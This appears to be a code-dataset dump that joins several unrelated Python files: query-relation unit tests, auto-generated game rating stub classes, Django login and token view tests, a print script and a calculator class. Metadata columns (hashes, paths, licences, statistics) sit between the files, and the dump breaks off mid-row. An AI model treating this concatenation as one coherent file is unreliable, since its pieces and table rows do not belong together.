('sign', 'b', 'sign', 'c', False),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', True),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', False),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', True),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', True),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', False),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', True),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', True),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', False),
('part', 'tim', 'part', 'tom2p', False),
('part', 'tom2p', 'part', 'tim', False),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', False),
('part', 'timb', 'part', 'tomb2p', False),
('part', 'tomb2p', 'part', 'timb', False),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', True),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', True),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', False),
('part', 'tome2n', 'part', 'time', False),
('part', 'time', 'part', 'tome2p', False),
('part', 'tome2p', 'part', 'time', False),
),
':2>': (
('sign', 'a', 'sign', 'c', False),
('sign', 'b', 'sign', 'c', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'd', 'sign', 'c', True),
('sign', 'e', 'sign', 'c', True),
('part', 's1', 'part', 's3', False),
('part', 's2', 'part', 's3', True),
('part', 's3', 'part', 's3', True),
('part', 's4', 'part', 's3', True),
('part', 's5', 'part', 's3', True),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', True),
('sign', 'c', 'part', 's3', True),
('sign', 'd', 'part', 's3', True),
('sign', 'e', 'part', 's3', True),
('part', 's1', 'sign', 'c', False),
('part', 's2', 'sign', 'c', True),
('part', 's3', 'sign', 'c', True),
('part', 's4', 'sign', 'c', True),
('part', 's5', 'sign', 'c', True),
('part', 'lower', 'part', 'upper', False),
('part', 'upper', 'part', 'lower', True),
('part', 'd2', 'part', 'small2', False),
('part', 'small2', 'part', 'd2', True),
('part', 't3', 'part', 'small2', True),
('part', 'small2', 'part', 't3', False),
('part', 'tim', 'part', 'tom', False),
('part', 'tom', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1n', False),
('part', 'tom1n', 'part', 'tim', True),
('part', 'tim', 'part', 'tom1p', False),
('part', 'tom1p', 'part', 'tim', True),
('part', 'tim', 'part', 'tom2n', False),
('part', 'tom2n', 'part', 'tim', True),
('part', 'tim', 'part', 'tom2p', True),
('part', 'tom2p', 'part', 'tim', True),
('part', 'timb', 'part', 'tomb', False),
('part', 'tomb', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1n', False),
('part', 'tomb1n', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb1p', False),
('part', 'tomb1p', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb2n', False),
('part', 'tomb2n', 'part', 'timb', True),
('part', 'timb', 'part', 'tomb2p', True),
('part', 'tomb2p', 'part', 'timb', True),
('part', 'time', 'part', 'tome', True),
('part', 'tome', 'part', 'time', False),
('part', 'time', 'part', 'tome1n', True),
('part', 'tome1n', 'part', 'time', False),
('part', 'time', 'part', 'tome1p', True),
('part', 'tome1p', 'part', 'time', False),
('part', 'time', 'part', 'tome2n', True),
('part', 'tome2n', 'part', 'time', True),
('part', 'time', 'part', 'tome2p', True),
('part', 'tome2p', 'part', 'time', False),
),
'.namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', False),
),
'.namesign=namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', False),
),
'.namesign=namepart.': (
('sign', 'a', 'part', 's1', True),
('sign', 'b', 'part', 's1', False),
('part', 's1', 'sign', 'a', False),
),
'.number.': (
('sign', 'a', 'part', 's1', True),
('sign', 'a', 'sign', 'a', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'part', 's1', False),
('sign', 'b', 'part', 's2', True),
),
'.namesign#namesign.': (
('sign', 'a', 'sign', 'a', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'a', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', True),
),
'.number#number.': (
('sign', 'a', 'part', 's1', False),
('sign', 'a', 'sign', 'a', False),
('sign', 'j', 'sign', 'j', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'part', 's1', True),
('sign', 'b', 'part', 's2', False),
),
'.number>number.': (
('sign', 'a', 'part', 's1', False),
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', False),
('sign', 'b', 'sign', 'a', True),
('sign', 'b', 'part', 's2', False),
('sign', 'b', 'part', 's1', True),
('sign', 'j', 'sign', 'j', False),
('sign', 'j', 'sign', 'a', False),
('sign', 'a', 'sign', 'j', False),
),
'.number<number.': (
('sign', 'a', 'part', 's1', False),
('sign', 'a', 'sign', 'a', False),
('sign', 'a', 'sign', 'b', True),
('sign', 'b', 'sign', 'a', False),
('part', 's2', 'sign', 'b', False),
('part', 's1', 'sign', 'b', True),
('sign', 'j', 'sign', 'j', False),
('sign', 'j', 'sign', 'a', False),
('sign', 'a', 'sign', 'j', False),
),
'.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': (
('sign', 'a', 'part', 's1', True),
('sign', 'b', 'part', 's2', True),
('sign', 'a', 'part', 's2', True),
('sign', 'b', 'part', 's1', True),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', True),
),
'.namesign~(^[sp]{2}-)|(-[sp]{2}$)~namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'b', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'a', 'sign', 'b', True),
('sign', 'a', 'sign', 'c', False),
),
'.namepart~(^[sp]{2}-)|(-[sp]{2}$)~namepart.': (
('part', 's1', 'part', 's1', True),
('part', 's2', 'part', 's2', True),
('part', 's3', 'part', 's3', True),
('part', 's1', 'part', 's2', True),
('part', 's1', 'part', 's3', False),
),
'.namesign~([sp]-)|(-[sp])~namepart.': (
('sign', 'a', 'part', 's1', True),
('sign', 'b', 'part', 's2', False),
('sign', 'a', 'part', 's2', False),
('sign', 'b', 'part', 's1', False),
('sign', 'a', 'part', 's3', False),
('sign', 'b', 'part', 's3', False),
('sign', 'c', 'part', 's3', False),
),
'.namesign~([sp]-)|(-[sp])~namesign.': (
('sign', 'a', 'sign', 'a', True),
('sign', 'b', 'sign', 'b', True),
('sign', 'c', 'sign', 'c', True),
('sign', 'a', 'sign', 'b', False),
('sign', 'a', 'sign', 'c', False),
),
'.namepart~([sp]-)|(-[sp])~namepart.': (
('part', 's1', 'part', 's1', True),
('part', 's2', 'part', 's2', True),
('part', 's3', 'part', 's3', True),
('part', 's1', 'part', 's2', False),
('part', 's1', 'part', 's3', False),
),
}
# BUILD THE TEST CLASS
def makeTests():
    """Build and return a unittest.TestCase subclass ('relations') with one
    test method per relation operator listed in the module-level
    `comparisons` dict.
    """
    # The central tester: run a query and check the result
    def basicRel(self, type1, name1, type2, name2, answer):
        '''
        Given the test parameters, build a query and run it.
        Depending on the node types involved, build additional
        queries with custom sets and run them.
        All queries should have the same result, given the parameters.
        That result is either the empty tuple or a singleton tuple.
        The expected answer states whether the result is the singleton tuple.
        '''
        rel = self.rel
        # Basic query: two atoms joined by the relation operator under test.
        template = f'''
{type1} name={name1}
{rel} {type2} name={name2}
'''
        hasResult = query(template) != ()
        self.assertions += 1
        self.assertTrue(hasResult if answer else not hasResult, msg=template)
        # Re-run the same comparison with custom set names substituted for
        # the raw node types; the outcome must be identical.
        # NOTE(review): assumes the module-level `sets` maps 'Node'/'Sign'
        # to the corresponding node sets — confirm against the setup code.
        tp1s = ('Node', 'Sign') if type1 == 'sign' else ('Node',)
        tp2s = ('Node', 'Sign') if type2 == 'sign' else ('Node',)
        for tp1 in tp1s:
            for tp2 in tp2s:
                template = f'''
{tp1} name={name1}
{rel} {tp2} name={name2}
'''
                hasResult = query(template, sets=sets) != ()
                with self.subTest(msg=template):
                    self.assertions += 1
                    self.assertTrue(hasResult if answer else not hasResult)

    def makeTest(relSym, params):
        '''
        Given a relation operator symbol and a sequence of parameters for the
        basic tester, define a function that executes a corresponding sequence
        of tests
        '''
        def xx(obj):
            # `obj` is the TestCase instance; stash the operator on it so
            # basicRel can interpolate it into the query templates.
            obj.rel = relSym
            for values in params:
                obj.basicRel(*values)
        return xx

    # Compose a dictionary of test functions, one per relation symbol.
    tests = {}
    for (relSym, params) in comparisons.items():
        # relationKey maps the operator symbol to a safe identifier suffix.
        testName = f'test_{relationKey[relSym]}'
        tests[testName] = makeTest(relSym, params)

    # See the unittest docs.
    # setUp and tearDown are used here for counting the assertions done.
    def setUp(self):
        self.assertions = 0

    def tearDown(self):
        # Accumulate this test's assertion count into the module-level total
        # and report progress on stderr (stdout is used by unittest itself).
        global assertions
        assertions += self.assertions
        sys.stderr.write(
            f'assertions checked: {self.assertions:>3}'
            f' overall {assertions} ... '
        )

    # build a test class and add attributes to it,
    # in particular the tests in the dictionary just constructed
    testClass = type('relations', (unittest.TestCase,), {
        'longMessage': False,
        'basicRel': basicRel,
        'setUp': setUp,
        'tearDown': tearDown,
        **tests,
    })
    return testClass
if __name__ == '__main__':
    # define the test class and call it relations
    relations = makeTests()
    # Module-level assertion counter, accumulated by tearDown across tests.
    assertions = 0
    # perform tests
    unittest.main()
    sys.exit()
    # if you need to debug, do it here,
    # and comment out the line unittest.main() above
    # NOTE: everything below is unreachable unless unittest.main() (and
    # sys.exit()) above are commented out — it is a deliberate debug stub.
    print(query('''
part name=upper
:0= part name=even
'''))
| 40.78238
| 78
| 0.408409
| 5,818
| 54,159
| 3.800275
| 0.046236
| 0.172185
| 0.040706
| 0.029172
| 0.860787
| 0.84844
| 0.828584
| 0.81194
| 0.80796
| 0.794663
| 0
| 0.02487
| 0.279104
| 54,159
| 1,327
| 79
| 40.813112
| 0.541429
| 0.019978
| 0
| 0.823529
| 0
| 0
| 0.299964
| 0.00932
| 0
| 0
| 0
| 0
| 0.007949
| 1
| 0.005564
| false
| 0
| 0.002385
| 0.000795
| 0.010334
| 0.000795
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b0c7a71294aef32ac40abaaad9dd371ffc16a72
| 6,407
|
py
|
Python
|
loldib/getratings/models/NA/na_nasus/na_nasus_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/na_nasus_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
loldib/getratings/models/NA/na_nasus/na_nasus_jng.py
|
koliupy/loldib
|
c9ab94deb07213cdc42b5a7c26467cdafaf81b7f
|
[
"Apache-2.0"
] | null | null | null |
from getratings.models.ratings import Ratings
# Auto-generated rating models: one empty Ratings subclass per opposing
# champion for Nasus played in the jungle on the NA region. The class name
# encodes region_champion_role_opponent; presumably the classes are looked
# up by name elsewhere in getratings — TODO confirm against the caller.
class NA_Nasus_Jng_Aatrox(Ratings):
    pass

class NA_Nasus_Jng_Ahri(Ratings):
    pass

class NA_Nasus_Jng_Akali(Ratings):
    pass

class NA_Nasus_Jng_Alistar(Ratings):
    pass

class NA_Nasus_Jng_Amumu(Ratings):
    pass

class NA_Nasus_Jng_Anivia(Ratings):
    pass

class NA_Nasus_Jng_Annie(Ratings):
    pass

class NA_Nasus_Jng_Ashe(Ratings):
    pass

class NA_Nasus_Jng_AurelionSol(Ratings):
    pass

class NA_Nasus_Jng_Azir(Ratings):
    pass

class NA_Nasus_Jng_Bard(Ratings):
    pass

class NA_Nasus_Jng_Blitzcrank(Ratings):
    pass

class NA_Nasus_Jng_Brand(Ratings):
    pass

class NA_Nasus_Jng_Braum(Ratings):
    pass

class NA_Nasus_Jng_Caitlyn(Ratings):
    pass

class NA_Nasus_Jng_Camille(Ratings):
    pass

class NA_Nasus_Jng_Cassiopeia(Ratings):
    pass

class NA_Nasus_Jng_Chogath(Ratings):
    pass

class NA_Nasus_Jng_Corki(Ratings):
    pass

class NA_Nasus_Jng_Darius(Ratings):
    pass

class NA_Nasus_Jng_Diana(Ratings):
    pass

class NA_Nasus_Jng_Draven(Ratings):
    pass

class NA_Nasus_Jng_DrMundo(Ratings):
    pass

class NA_Nasus_Jng_Ekko(Ratings):
    pass

class NA_Nasus_Jng_Elise(Ratings):
    pass

class NA_Nasus_Jng_Evelynn(Ratings):
    pass

class NA_Nasus_Jng_Ezreal(Ratings):
    pass

class NA_Nasus_Jng_Fiddlesticks(Ratings):
    pass

class NA_Nasus_Jng_Fiora(Ratings):
    pass

class NA_Nasus_Jng_Fizz(Ratings):
    pass

class NA_Nasus_Jng_Galio(Ratings):
    pass

class NA_Nasus_Jng_Gangplank(Ratings):
    pass

class NA_Nasus_Jng_Garen(Ratings):
    pass

class NA_Nasus_Jng_Gnar(Ratings):
    pass

class NA_Nasus_Jng_Gragas(Ratings):
    pass

class NA_Nasus_Jng_Graves(Ratings):
    pass

class NA_Nasus_Jng_Hecarim(Ratings):
    pass

class NA_Nasus_Jng_Heimerdinger(Ratings):
    pass

class NA_Nasus_Jng_Illaoi(Ratings):
    pass

class NA_Nasus_Jng_Irelia(Ratings):
    pass

class NA_Nasus_Jng_Ivern(Ratings):
    pass

class NA_Nasus_Jng_Janna(Ratings):
    pass

class NA_Nasus_Jng_JarvanIV(Ratings):
    pass

class NA_Nasus_Jng_Jax(Ratings):
    pass

class NA_Nasus_Jng_Jayce(Ratings):
    pass

class NA_Nasus_Jng_Jhin(Ratings):
    pass

class NA_Nasus_Jng_Jinx(Ratings):
    pass

class NA_Nasus_Jng_Kalista(Ratings):
    pass

class NA_Nasus_Jng_Karma(Ratings):
    pass

class NA_Nasus_Jng_Karthus(Ratings):
    pass

class NA_Nasus_Jng_Kassadin(Ratings):
    pass

class NA_Nasus_Jng_Katarina(Ratings):
    pass

class NA_Nasus_Jng_Kayle(Ratings):
    pass

class NA_Nasus_Jng_Kayn(Ratings):
    pass

class NA_Nasus_Jng_Kennen(Ratings):
    pass

class NA_Nasus_Jng_Khazix(Ratings):
    pass

class NA_Nasus_Jng_Kindred(Ratings):
    pass

class NA_Nasus_Jng_Kled(Ratings):
    pass

class NA_Nasus_Jng_KogMaw(Ratings):
    pass

class NA_Nasus_Jng_Leblanc(Ratings):
    pass

class NA_Nasus_Jng_LeeSin(Ratings):
    pass

class NA_Nasus_Jng_Leona(Ratings):
    pass

class NA_Nasus_Jng_Lissandra(Ratings):
    pass

class NA_Nasus_Jng_Lucian(Ratings):
    pass

class NA_Nasus_Jng_Lulu(Ratings):
    pass

class NA_Nasus_Jng_Lux(Ratings):
    pass

class NA_Nasus_Jng_Malphite(Ratings):
    pass

class NA_Nasus_Jng_Malzahar(Ratings):
    pass

class NA_Nasus_Jng_Maokai(Ratings):
    pass

class NA_Nasus_Jng_MasterYi(Ratings):
    pass

class NA_Nasus_Jng_MissFortune(Ratings):
    pass

class NA_Nasus_Jng_MonkeyKing(Ratings):
    pass

class NA_Nasus_Jng_Mordekaiser(Ratings):
    pass

class NA_Nasus_Jng_Morgana(Ratings):
    pass

class NA_Nasus_Jng_Nami(Ratings):
    pass

class NA_Nasus_Jng_Nasus(Ratings):
    pass

class NA_Nasus_Jng_Nautilus(Ratings):
    pass

class NA_Nasus_Jng_Nidalee(Ratings):
    pass

class NA_Nasus_Jng_Nocturne(Ratings):
    pass

class NA_Nasus_Jng_Nunu(Ratings):
    pass

class NA_Nasus_Jng_Olaf(Ratings):
    pass

class NA_Nasus_Jng_Orianna(Ratings):
    pass

class NA_Nasus_Jng_Ornn(Ratings):
    pass

class NA_Nasus_Jng_Pantheon(Ratings):
    pass

class NA_Nasus_Jng_Poppy(Ratings):
    pass

class NA_Nasus_Jng_Quinn(Ratings):
    pass

class NA_Nasus_Jng_Rakan(Ratings):
    pass

class NA_Nasus_Jng_Rammus(Ratings):
    pass

class NA_Nasus_Jng_RekSai(Ratings):
    pass

class NA_Nasus_Jng_Renekton(Ratings):
    pass

class NA_Nasus_Jng_Rengar(Ratings):
    pass

class NA_Nasus_Jng_Riven(Ratings):
    pass

class NA_Nasus_Jng_Rumble(Ratings):
    pass

class NA_Nasus_Jng_Ryze(Ratings):
    pass

class NA_Nasus_Jng_Sejuani(Ratings):
    pass

class NA_Nasus_Jng_Shaco(Ratings):
    pass

class NA_Nasus_Jng_Shen(Ratings):
    pass

class NA_Nasus_Jng_Shyvana(Ratings):
    pass

class NA_Nasus_Jng_Singed(Ratings):
    pass

class NA_Nasus_Jng_Sion(Ratings):
    pass

class NA_Nasus_Jng_Sivir(Ratings):
    pass

class NA_Nasus_Jng_Skarner(Ratings):
    pass

class NA_Nasus_Jng_Sona(Ratings):
    pass

class NA_Nasus_Jng_Soraka(Ratings):
    pass

class NA_Nasus_Jng_Swain(Ratings):
    pass

class NA_Nasus_Jng_Syndra(Ratings):
    pass

class NA_Nasus_Jng_TahmKench(Ratings):
    pass

class NA_Nasus_Jng_Taliyah(Ratings):
    pass

class NA_Nasus_Jng_Talon(Ratings):
    pass

class NA_Nasus_Jng_Taric(Ratings):
    pass

class NA_Nasus_Jng_Teemo(Ratings):
    pass

class NA_Nasus_Jng_Thresh(Ratings):
    pass

class NA_Nasus_Jng_Tristana(Ratings):
    pass

class NA_Nasus_Jng_Trundle(Ratings):
    pass

class NA_Nasus_Jng_Tryndamere(Ratings):
    pass

class NA_Nasus_Jng_TwistedFate(Ratings):
    pass

class NA_Nasus_Jng_Twitch(Ratings):
    pass

class NA_Nasus_Jng_Udyr(Ratings):
    pass

class NA_Nasus_Jng_Urgot(Ratings):
    pass

class NA_Nasus_Jng_Varus(Ratings):
    pass

class NA_Nasus_Jng_Vayne(Ratings):
    pass

class NA_Nasus_Jng_Veigar(Ratings):
    pass

class NA_Nasus_Jng_Velkoz(Ratings):
    pass

class NA_Nasus_Jng_Vi(Ratings):
    pass

class NA_Nasus_Jng_Viktor(Ratings):
    pass

class NA_Nasus_Jng_Vladimir(Ratings):
    pass

class NA_Nasus_Jng_Volibear(Ratings):
    pass

class NA_Nasus_Jng_Warwick(Ratings):
    pass

class NA_Nasus_Jng_Xayah(Ratings):
    pass

class NA_Nasus_Jng_Xerath(Ratings):
    pass

class NA_Nasus_Jng_XinZhao(Ratings):
    pass

class NA_Nasus_Jng_Yasuo(Ratings):
    pass

class NA_Nasus_Jng_Yorick(Ratings):
    pass

class NA_Nasus_Jng_Zac(Ratings):
    pass

class NA_Nasus_Jng_Zed(Ratings):
    pass

class NA_Nasus_Jng_Ziggs(Ratings):
    pass

class NA_Nasus_Jng_Zilean(Ratings):
    pass

class NA_Nasus_Jng_Zyra(Ratings):
    pass
| 15.364508
| 46
| 0.761667
| 972
| 6,407
| 4.59465
| 0.151235
| 0.216301
| 0.370802
| 0.463502
| 0.797582
| 0.797582
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173404
| 6,407
| 416
| 47
| 15.401442
| 0.843278
| 0
| 0
| 0.498195
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.498195
| 0.00361
| 0
| 0.501805
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
3b153425778774d12a62ab944bd2d03a17bf5404
| 4,537
|
py
|
Python
|
users/tests/test_views.py
|
schiederme/peering-manager
|
2d29427fd4f2b91a5208f31e1a7ad69eaf82924c
|
[
"Apache-2.0"
] | 173
|
2020-08-08T15:38:08.000Z
|
2022-03-21T11:35:25.000Z
|
users/tests/test_views.py
|
schiederme/peering-manager
|
2d29427fd4f2b91a5208f31e1a7ad69eaf82924c
|
[
"Apache-2.0"
] | 247
|
2017-12-26T12:55:34.000Z
|
2020-08-08T11:57:35.000Z
|
users/tests/test_views.py
|
schiederme/peering-manager
|
2d29427fd4f2b91a5208f31e1a7ad69eaf82924c
|
[
"Apache-2.0"
] | 63
|
2017-10-13T06:46:05.000Z
|
2020-08-08T00:41:57.000Z
|
from django.urls import reverse
from users.models import Token
from utils.tests import ViewTestCase
class UserTestCase(ViewTestCase):
    """View tests for the users app: login/logout, profile, password
    change and API token management pages.

    Each page test first checks that an anonymous request is redirected
    (302), then logs in and checks that the page renders (200).
    """

    def setUp(self):
        super().setUp()
        # A token owned by the test user, targeted by the edit/delete views.
        self.token = Token.objects.create(user=self.user)

    def _login(self):
        """Log the test user in and assert the session is active.

        Returns the (followed) login response so callers can make further
        assertions on it.
        """
        response = self.client.post(reverse("login"), self.credentials, follow=True)
        # Should be logged in
        self.assertTrue(response.context["user"].is_active)
        return response

    def test_login_view(self):
        response = self.client.get(reverse("login"))
        self.assertEqual(response.status_code, 200)
        # Login
        response = self._login()
        self.assertEqual(response.status_code, 200)

    def test_logout_view(self):
        response = self.client.get(reverse("logout"))
        # Without being logged in -> redirection
        self.assertEqual(response.status_code, 302)
        # Login; logout should then work too
        self._login()
        response = self.client.get(reverse("logout"))
        self.assertEqual(response.status_code, 302)

    def test_user_profile_view(self):
        response = self.client.get(reverse("users:profile"))
        # Without being logged in -> redirection
        self.assertEqual(response.status_code, 302)
        # Login; the page should then work
        self._login()
        response = self.client.get(reverse("users:profile"))
        self.assertEqual(response.status_code, 200)

    def test_user_change_password_view(self):
        response = self.client.get(reverse("users:change_password"))
        # Without being logged in -> redirection
        self.assertEqual(response.status_code, 302)
        # Login; the page should then work
        self._login()
        response = self.client.get(reverse("users:change_password"))
        self.assertEqual(response.status_code, 200)

    def test_user_token_list_view(self):
        response = self.client.get(reverse("users:token_list"))
        # Without being logged in -> redirection
        self.assertEqual(response.status_code, 302)
        # Login; the page should then work
        self._login()
        response = self.client.get(reverse("users:token_list"))
        self.assertEqual(response.status_code, 200)

    def test_user_token_add_view(self):
        response = self.client.get(reverse("users:token_add"))
        # Without being logged in -> redirection
        self.assertEqual(response.status_code, 302)
        # Login; the page should then work
        self._login()
        response = self.client.get(reverse("users:token_add"))
        self.assertEqual(response.status_code, 200)

    def test_user_token_edit_view(self):
        response = self.client.get(
            reverse("users:token_edit", kwargs={"pk": self.token.pk})
        )
        # Without being logged in -> redirection
        self.assertEqual(response.status_code, 302)
        # Login; the page should then work
        self._login()
        response = self.client.get(
            reverse("users:token_edit", kwargs={"pk": self.token.pk})
        )
        self.assertEqual(response.status_code, 200)

    def test_user_token_delete_view(self):
        # BUG FIX: this method was previously also named
        # test_user_token_edit_view, which shadowed the edit test above so
        # it never ran.
        response = self.client.get(
            reverse("users:token_delete", kwargs={"pk": self.token.pk})
        )
        # Without being logged in -> redirection
        self.assertEqual(response.status_code, 302)
        # Login; the page should then work
        self._login()
        response = self.client.get(
            reverse("users:token_delete", kwargs={"pk": self.token.pk})
        )
        self.assertEqual(response.status_code, 200)
| 40.150442
| 84
| 0.659687
| 543
| 4,537
| 5.399632
| 0.110497
| 0.094134
| 0.141201
| 0.158254
| 0.912688
| 0.912688
| 0.884038
| 0.840723
| 0.783765
| 0.736357
| 0
| 0.013629
| 0.223716
| 4,537
| 112
| 85
| 40.508929
| 0.818853
| 0.133348
| 0
| 0.742857
| 0
| 0
| 0.075486
| 0.010747
| 0
| 0
| 0
| 0
| 0.342857
| 1
| 0.128571
| false
| 0.042857
| 0.042857
| 0
| 0.185714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b964d9eb650471a48dda912d6ab71c61f3cdf3b
| 45
|
py
|
Python
|
test2a.py
|
alibumaye81/topsy_new
|
c31d951b61bd0b33108ce891a7cdacfefafd72e1
|
[
"Apache-2.0"
] | null | null | null |
test2a.py
|
alibumaye81/topsy_new
|
c31d951b61bd0b33108ce891a7cdacfefafd72e1
|
[
"Apache-2.0"
] | null | null | null |
test2a.py
|
alibumaye81/topsy_new
|
c31d951b61bd0b33108ce891a7cdacfefafd72e1
|
[
"Apache-2.0"
] | null | null | null |
# Emit the greeting lines in order (same output as the three bare prints).
for message in ("Hello", "Hello", "Topsy"):
    print(message)
| 11.25
| 14
| 0.666667
| 6
| 45
| 5
| 0.5
| 0.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 45
| 3
| 15
| 15
| 0.714286
| 0
| 0
| 0.666667
| 0
| 0
| 0.333333
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
d90bcfc570ab26490024925691e3f48692b4bc4c
| 343
|
py
|
Python
|
main/calc.py
|
pennowtech/CITests
|
d756a5f4ef53fdea2aaf02052fd1ff9d793a05f0
|
[
"MIT"
] | null | null | null |
main/calc.py
|
pennowtech/CITests
|
d756a5f4ef53fdea2aaf02052fd1ff9d793a05f0
|
[
"MIT"
] | 1
|
2019-11-26T23:23:58.000Z
|
2019-11-26T23:26:51.000Z
|
main/calc.py
|
linkedtechs/CITests
|
d756a5f4ef53fdea2aaf02052fd1ff9d793a05f0
|
[
"MIT"
] | null | null | null |
"""
Calculator library containing basic math operations.
"""
class Calculator:
    """Elementary two-operand arithmetic operations."""

    def add(self, first_term, second_term):
        """Return the sum of the two terms."""
        result = first_term + second_term
        return result

    def subtract(self, first_term, second_term):
        """Return the first term minus the second."""
        result = first_term - second_term
        return result

    def divide(self, first_term, second_term):
        """Return the true-division quotient (raises ZeroDivisionError for a zero divisor)."""
        result = first_term / second_term
        return result
| 22.866667
| 52
| 0.708455
| 44
| 343
| 5.25
| 0.363636
| 0.233766
| 0.38961
| 0.493506
| 0.649351
| 0.649351
| 0.649351
| 0.649351
| 0.649351
| 0.649351
| 0
| 0
| 0.215743
| 343
| 14
| 53
| 24.5
| 0.858736
| 0.151604
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.428571
| false
| 0
| 0
| 0.428571
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
d926d754c5cf7a35f05fba9862f32fecc7f04ccc
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_0.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_0.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_0.py
|
truthiswill/intellij-community
|
fff88cfb0dc168eea18ecb745d3e5b93f57b0b95
|
[
"Apache-2.0"
